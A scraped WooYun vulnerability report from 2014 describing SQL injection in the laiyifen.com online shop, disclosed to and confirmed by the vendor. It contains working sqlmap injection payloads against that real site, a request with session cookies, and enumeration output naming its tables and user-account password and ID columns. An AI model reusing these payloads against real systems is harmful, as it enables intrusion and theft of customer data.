来伊份官方商城某处SQL注入可致80W+用户数据泄露

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-083795

漏洞标题：来伊份官方商城某处SQL注入可致80W+用户数据泄露

漏洞作者： pandada

提交时间：2014-11-19 11:25

修复时间：2015-01-03 11:28

公开时间：2015-01-03 11:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-11-19：细节已通知厂商并且等待厂商处理中
2014-11-19：厂商已经确认，细节仅向厂商公开
2014-11-29：细节向核心白帽子及相关领域专家公开
2014-12-09：细节向普通白帽子公开
2014-12-19：细节向实习白帽子公开
2015-01-03：细节向公众公开

简要描述：

来伊份作为中国休闲食品连锁零售业的领导品牌，目前在上海、江苏、浙江等9个省、直辖市拥有近2400家专卖店，每年为近6000万人次提供优质食品。从1999年第一家门店开业起，来伊份陆续推出过炒货、肉制品等9大系列700多种食品。2013年销售额超过30亿，全国员工人数近1万名。“三好一公道”是来伊份的经营理念，即品质好、味道好、服务好和价格公道。

详细说明：

注入点说明：（星号部分为注入点）

GET /index.php/article-guanyuwomen-lists-1*.html HTTP/1.1
Referer: http://www.laiyifen.com:80/
Cookie: vary=d77f798a56ce90753573fc70c883ad591a94ee60638487365167a950e7783a9a; laiyifen_cookie=536871690.20480.0000; s=1e8737f4e245da0cab3df00d44c7437d; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; cart[go_back_link]=http%3A%2F%2Fwww.laiyifen.com%2F; ZDEDebuggerPresent=php,phtml,php3; MEMBER=-d41d8cd98f00b204e9800998ecf8427e-d41d8cd98f00b204e9800998ecf8427e-1415515310
Host: www.laiyifen.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

漏洞证明：

sqlmap identified the following injection points with a total of 235 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html
---
current user:    'laiyifendb@10.3.%.%'
current database:    'laiyifendb'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html
---
available databases [3]:
[*] information_schema
[*] laiyifendb
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html
---
Database: laiyifendb
[176 tables]
+-----------------------------------------+
| app_default_info                        |
| awardlist                               |
| awardlist_copy                          |
| collect_shop                            |
| ds_0303_add                             |
| ds_0303_payment                         |
| ds_0303_ptype                           |
| ds_0303_rpcpoll                         |
| ds_ectools_analysis_logs                |
| ds_ectools_analysis_logs_2              |
| ds_guajian_1                            |
| luck_log                                |
| luck_log_mobile                         |
| member_lucknum                          |
| mobile_promotion_goods                  |
| moblie_luck_num                         |
| sdb_aftersales_return_product           |
| sdb_authenticator_clients               |
| sdb_authenticator_logs                  |
| sdb_authenticator_requestlist           |
| sdb_b2c_bcompany                        |
| sdb_b2c_brand                           |
| sdb_b2c_cart                            |
| sdb_b2c_cart_objects                    |
| sdb_b2c_comment_goods_point             |
| sdb_b2c_comment_goods_type              |
| sdb_b2c_counter                         |
| sdb_b2c_counter_attach                  |
| sdb_b2c_coupons                         |
| sdb_b2c_delivery                        |
| sdb_b2c_delivery_items                  |
| sdb_b2c_dly_h_area                      |
| sdb_b2c_dlycorp                         |
| sdb_b2c_dlytype                         |
| sdb_b2c_ecpool                          |
| sdb_b2c_ecpool_mobile                   |
| sdb_b2c_excard_rule                     |
| sdb_b2c_excard_used                     |
| sdb_b2c_fbtad                           |
| sdb_b2c_goods                           |
| sdb_b2c_goods_cat                       |
| sdb_b2c_goods_keywords                  |
| sdb_b2c_goods_lv_price                  |
| sdb_b2c_goods_promotion_ref             |
| sdb_b2c_goods_rate                      |
| sdb_b2c_goods_spec_index                |
| sdb_b2c_goods_type                      |
| sdb_b2c_goods_type_props                |
| sdb_b2c_goods_type_props_value          |
| sdb_b2c_goods_type_spec                 |
| sdb_b2c_goods_virtual_cat               |
| sdb_b2c_history_orders                  |
| sdb_b2c_history_products                |
| sdb_b2c_huodong_log                     |
| sdb_b2c_huodongda                       |
| sdb_b2c_jiang                           |
| sdb_b2c_jiang_huodong                   |
| sdb_b2c_jiang_log                       |
| sdb_b2c_jiang_members                   |
| sdb_b2c_lulu_card                       |
| sdb_b2c_member_addrs                    |
| sdb_b2c_member_advance                  |
| sdb_b2c_member_comments                 |
| sdb_b2c_member_coupon                   |
| sdb_b2c_member_goods                    |
| sdb_b2c_member_lv                       |
| sdb_b2c_member_msg                      |
| sdb_b2c_member_point                    |
| sdb_b2c_member_pwdlog                   |
| sdb_b2c_member_systmpl                  |
| sdb_b2c_members                         |
| sdb_b2c_meng_buy_1                      |
| sdb_b2c_meng_good_gift                  |
| sdb_b2c_meng_luck_reg                   |
| sdb_b2c_meng_send                       |
| sdb_b2c_order_coupon_user               |
| sdb_b2c_order_delivery                  |
| sdb_b2c_order_items                     |
| sdb_b2c_order_log                       |
| sdb_b2c_order_objects                   |
| sdb_b2c_order_pmt                       |
| sdb_b2c_orders                          |
| sdb_b2c_products                        |
| sdb_b2c_recharge_log                    |
| sdb_b2c_reship                          |
| sdb_b2c_reship_items                    |
| sdb_b2c_sales_baifendian                |
| sdb_b2c_sales_bangdingsp                |
| sdb_b2c_sales_freeShipping              |
| sdb_b2c_sales_rule_goods                |
| sdb_b2c_sales_rule_order                |
| sdb_b2c_sell_logs                       |
| sdb_b2c_shop                            |
| sdb_b2c_single                          |
| sdb_b2c_spec_values                     |
| sdb_b2c_specification                   |
| sdb_b2c_type_brand                      |
| sdb_b2copenapi_api_fail                 |
| sdb_b2copenapi_api_log                  |
| sdb_b2copenapi_api_log_copy             |
| sdb_b2copenapi_api_mobile_logs          |
| sdb_b2copenapi_request_shops            |
| sdb_base_app_content                    |
| sdb_base_apps                           |
| sdb_base_cache_expires                  |
| sdb_base_files                          |
| sdb_base_kvstore                        |
| sdb_base_network                        |
| sdb_base_queue                          |
| sdb_base_rpcnotify                      |
| sdb_base_rpcpoll                        |
| sdb_base_task                           |
| sdb_content_article_bodys               |
| sdb_content_article_indexs              |
| sdb_content_article_nodes               |
| sdb_couponlog_order_coupon_ref          |
| sdb_couponlog_order_coupon_user         |
| sdb_dbeav_meta_register                 |
| sdb_dbeav_meta_value_datetime           |
| sdb_dbeav_meta_value_decimal            |
| sdb_dbeav_meta_value_int                |
| sdb_dbeav_meta_value_longtext           |
| sdb_dbeav_meta_value_text               |
| sdb_dbeav_meta_value_varchar            |
| sdb_dbeav_recycle                       |
| sdb_desktop_filter                      |
| sdb_desktop_flow                        |
| sdb_desktop_hasrole                     |
| sdb_desktop_menus                       |
| sdb_desktop_recycle                     |
| sdb_desktop_role_flow                   |
| sdb_desktop_roles                       |
| sdb_desktop_tag                         |
| sdb_desktop_tag_rel                     |
| sdb_desktop_user_flow                   |
| sdb_desktop_users                       |
| sdb_ectools_analysis                    |
| sdb_ectools_analysis_logs               |
| sdb_ectools_currency                    |
| sdb_ectools_order_bills                 |
| sdb_ectools_payments                    |
| sdb_ectools_refunds                     |
| sdb_ectools_regions                     |
| sdb_gift_cat                            |
| sdb_gift_ref                            |
| sdb_giftpackage_giftpackage             |
| sdb_giftpackage_order_ref               |
| sdb_image_image                         |
| sdb_image_image_attach                  |
| sdb_operatorlogmanage_logs              |
| sdb_operatorlogmanage_register          |
| sdb_pam_account                         |
| sdb_pam_auth                            |
| sdb_pam_log                             |
| sdb_pointprofessional_member_point_task |
| sdb_recommended_goods                   |
| sdb_recommended_goods_period            |
| sdb_search_search                       |
| sdb_site_explorers                      |
| sdb_site_link                           |
| sdb_site_menus                          |
| sdb_site_modules                        |
| sdb_site_route_statics                  |
| sdb_site_seo                            |
| sdb_site_themes                         |
| sdb_site_themes_tmpl                    |
| sdb_site_widgets                        |
| sdb_site_widgets_instance               |
| sdb_site_widgets_proinstance            |
| sdb_timedbuy_objitems                   |
| shoplist                                |
| swjiang_contect                         |
| swjiang_contect_copy                    |
| tbasarea                                |
| tbaschildarea                           |
| tbasthirdarea                           |
+-----------------------------------------+

Database: laiyifendb
Table: sdb_pam_account
[9 columns]
+----------------+-----------------------+
| Column         | Type                  |
+----------------+-----------------------+
| account_id     | mediumint(8) unsigned |
| account_type   | varchar(30)           |
| createtime     | int(10) unsigned      |
| disabled       | enum('true','false')  |
| hmlogin        | enum('false','true')  |
| hmupdate       | enum('0','1')         |
| login_name     | varchar(100)          |
| login_password | varchar(32)           |
| openlogin      | varchar(60)           |
+----------------+-----------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html
---
Database: laiyifendb
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| sdb_pam_account | 805856  |
+-----------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html
---
Database: laiyifendb
Table: sdb_b2c_members
[70 columns]
+----------------+-----------------------+
| Column         | Type                  |
+----------------+-----------------------+
| addon          | longtext              |
| addr           | varchar(255)          |
| advance        | decimal(20,3)         |
| advance_freeze | decimal(20,3)         |
| anyolife_uname | varchar(100)          |
| area           | varchar(255)          |
| b_day          | tinyint(3) unsigned   |
| b_month        | tinyint(3) unsigned   |
| b_year         | smallint(5) unsigned  |
| bind_time      | int(10) unsigned      |
| biz_money      | decimal(20,3)         |
| card_no        | varchar(20)           |
| card_type      | varchar(45)           |
| cert_no        | varchar(100)          |
| cert_type      | varchar(200)          |
| cur            | varchar(20)           |
| custom         | longtext              |
| disabled       | enum('true','false')  |
| education      | varchar(45)           |
| email          | varchar(200)          |
| end_date       | int(10) unsigned      |
| experience     | int(10)               |
| family_mem     | varchar(45)           |
| fav_tags       | longtext              |
| firstname      | varchar(50)           |
| foreign_id     | varchar(255)          |
| interest       | longtext              |
| is_card        | enum('0','1')         |
| is_upload      | enum('0','1')         |
| job            | varchar(200)          |
| lang           | varchar(20)           |
| last_loginip   | varchar(16)           |
| last_logintime | int(10) unsigned      |
| lastname       | varchar(50)           |
| login_count    | int(11)               |
| login_source   | varchar(45)           |
| member_id      | mediumint(8) unsigned |
| member_lv_id   | mediumint(8) unsigned |
| member_refer   | varchar(50)           |
| mobile         | varchar(30)           |
| month_income   | varchar(45)           |
| name           | varchar(50)           |
| nation         | varchar(45)           |
| order_num      | mediumint(8) unsigned |
| pay_time       | mediumint(8) unsigned |
| point          | int(10)               |
| point_freeze   | mediumint(8) unsigned |
| point_history  | mediumint(8) unsigned |
| refer_id       | varchar(50)           |
| refer_url      | varchar(200)          |
| reg_ip         | varchar(16)           |
| reg_source     | varchar(45)           |
| regtime        | int(10) unsigned      |
| remark         | text                  |
| remark_type    | varchar(2)            |
| score_rate     | decimal(5,3)          |
| sex            | enum('0','1','2')     |
| state          | tinyint(1)            |
| sum_pointtotal | decimal(20,3)         |
| tel            | varchar(30)           |
| unreadmsg      | smallint(5) unsigned  |
| use_total      | decimal(20,3)         |
| vipapply_no    | varchar(45)           |
| vipapply_time  | int(10) unsigned      |
| vipcard_no     | varchar(45)           |
| vipcard_pwd    | varchar(45)           |
| vipinfo_no     | varchar(20)           |
| vocation       | varchar(50)           |
| wedlock        | enum('0','1')         |
| zip            | varchar(20)           |
+----------------+-----------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND 3372=3372 AND "GBOg"="GBOg.html
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x3a7374703a,(SELECT (CASE WHEN (9648=9648) THEN 1 ELSE 0 END)),0x3a656f733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "RgGC"="RgGC.html
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://www.laiyifen.com:80/index.php/article-guanyuwomen-lists-1" AND SLEEP(5) AND "iUWY"="iUWY.html
---
Database: laiyifendb
+-----------------+---------+
| Table           | Entries |
+-----------------+---------+
| sdb_b2c_members | 805876  |
+-----------------+---------+

具体数据我就不dump了。

修复方案：

加强参数过滤。

版权声明：转载请注明来源 pandada@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2014-11-19 17:20

厂商回复：

非常感谢乌云和pandada的支持，非常感谢！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-083795

漏洞标题：来伊份官方商城某处SQL注入可致80W+用户数据泄露

相关厂商：laiyifen.com

漏洞作者： pandada

提交时间：2014-11-19 11:25

修复时间：2015-01-03 11:28

公开时间：2015-01-03 11:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 pandada@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-083795

漏洞标题：来伊份官方商城某处SQL注入可致80W+用户数据泄露

相关厂商：laiyifen.com

漏洞作者： pandada

提交时间：2014-11-19 11:25

修复时间：2015-01-03 11:28

公开时间：2015-01-03 11:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-083795"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 pandada@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：